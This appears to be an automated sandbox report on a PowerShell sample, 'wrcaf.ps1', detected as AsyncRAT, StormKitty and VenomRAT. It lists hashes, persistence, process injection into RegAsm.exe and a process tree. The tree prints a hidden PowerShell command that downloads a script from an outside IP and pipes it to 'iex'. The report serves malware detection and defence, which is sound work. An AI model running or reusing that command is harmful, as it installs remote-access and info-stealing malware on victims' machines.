Analysis
- max time kernel: 149s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 02/01/2025, 18:15
Static task: static1
Behavioral task: behavioral1
Sample: wrcaf.ps1
Resource: win7-20240903-en
General
- Target: wrcaf.ps1
- Size: 2KB
- MD5: 898d5189a1dc57fa7a80b4d986ef77c9
- SHA1: aeb3667119b2fda564f498d26c04758caf44b1c5
- SHA256: 61270d6564a80eff42a00bf542fc79224949fb27df8c1d6d3acbaa6000fc8577
- SHA512: d8cc4add28939f7072fad657b863f0e49ae420bae27a952db499f66caebbda79ff29a552f12ef0cd2cbd1d32003c0db940f0a16bceca196cd3684472c0c2e8c8
Malware Config
Signatures
- Asyncrat family
- StormKitty
  StormKitty is an open source info stealer written in C#.
- StormKitty payload (1 IoCs)
  resource                                                              yara_rule
  behavioral2/memory/2476-58-0x0000000000400000-0x0000000000704000-memory.dmp  family_stormkitty
- Stormkitty family
- resource                                                              yara_rule
  behavioral2/memory/2476-58-0x0000000000400000-0x0000000000704000-memory.dmp  VenomRAT
- Venomrat family
- Blocklisted process makes network request (2 IoCs)
  flow  pid   Process
  7     3960  powershell.exe
  16    372   powershell.exe
- pid   Process
  3960  powershell.exe
  372   powershell.exe
- Downloads MZ/PE file
- Drops startup file (1 IoCs)
  description                   ioc                                                                                          Process
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url  powershell.exe
- Executes dropped EXE (1 IoCs)
  pid   Process
  1624  Package.exe
- Loads dropped DLL (1 IoCs)
  pid   Process
  1624  Package.exe
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of SetThreadContext (1 IoCs)
  description                         pid  Process         procid_target
  PID 372 set thread context of 2476  372  powershell.exe  93
- Program crash (1 IoCs)
  pid   pid_target  Process       procid_target
  2740  1624        WerFault.exe  86
- System Location Discovery: System Language Discovery (1 TTPs, 6 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description  ioc                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  csc.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cvtres.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  RegAsm.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  Package.exe
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  pid   Process
  3960  powershell.exe
  3960  powershell.exe
  3960  powershell.exe
  3960  powershell.exe
  372   powershell.exe
  372   powershell.exe
  2476  RegAsm.exe
  2476  RegAsm.exe
  2476  RegAsm.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3960  powershell.exe
  Token: SeDebugPrivilege  372   powershell.exe
  Token: SeDebugPrivilege  2476  RegAsm.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  pid   Process
  1624  Package.exe
  1624  Package.exe
  1624  Package.exe
  2476  RegAsm.exe
- Suspicious use of WriteProcessMemory (25 IoCs)
  description                       pid   Process         procid_target
  PID 3960 wrote to memory of 2288  3960  powershell.exe  85
  PID 3960 wrote to memory of 2288  3960  powershell.exe  85
  PID 2288 wrote to memory of 1624  2288  cmd.exe         86
  PID 2288 wrote to memory of 1624  2288  cmd.exe         86
  PID 2288 wrote to memory of 1624  2288  cmd.exe         86
  PID 1624 wrote to memory of 212   1624  Package.exe     87
  PID 1624 wrote to memory of 212   1624  Package.exe     87
  PID 1624 wrote to memory of 212   1624  Package.exe     87
  PID 212 wrote to memory of 372    212   cmd.exe         89
  PID 212 wrote to memory of 372    212   cmd.exe         89
  PID 212 wrote to memory of 372    212   cmd.exe         89
  PID 372 wrote to memory of 1956   372   powershell.exe  91
  PID 372 wrote to memory of 1956   372   powershell.exe  91
  PID 372 wrote to memory of 1956   372   powershell.exe  91
  PID 1956 wrote to memory of 4712  1956  csc.exe         92
  PID 1956 wrote to memory of 4712  1956  csc.exe         92
  PID 1956 wrote to memory of 4712  1956  csc.exe         92
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
  PID 372 wrote to memory of 2476   372   powershell.exe  93
Processes (nested by parent/child)
- PID 3960: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\wrcaf.ps1
  Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Drops startup file; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - PID 2288: C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Package.exe"
    Signatures: Suspicious use of WriteProcessMemory
    - PID 1624: C:\Windows\Temp\Package.exe
      Command line: C:\Windows\Temp\Package.exe
      Signatures: Executes dropped EXE; Loads dropped DLL; System Location Discovery: System Language Discovery; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
      - PID 212: C:\Windows\SysWOW64\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
        - PID 372: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
          Signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious use of SetThreadContext; System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - PID 1956: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\35gt05ar\35gt05ar.cmdline"
            Signatures: System Location Discovery: System Language Discovery; Suspicious use of WriteProcessMemory
            - PID 4712: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4E6.tmp" "c:\Users\Admin\AppData\Local\Temp\35gt05ar\CSC679C3671FB4043C58A475C966723ACE.TMP"
              Signatures: System Location Discovery: System Language Discovery
          - PID 2476: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
      - PID 2740: C:\Windows\SysWOW64\WerFault.exe
        Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 180
        Signatures: Program crash
- PID 4768: C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1624 -ip 1624
Network
MITRE ATT&CK Enterprise v15
Downloads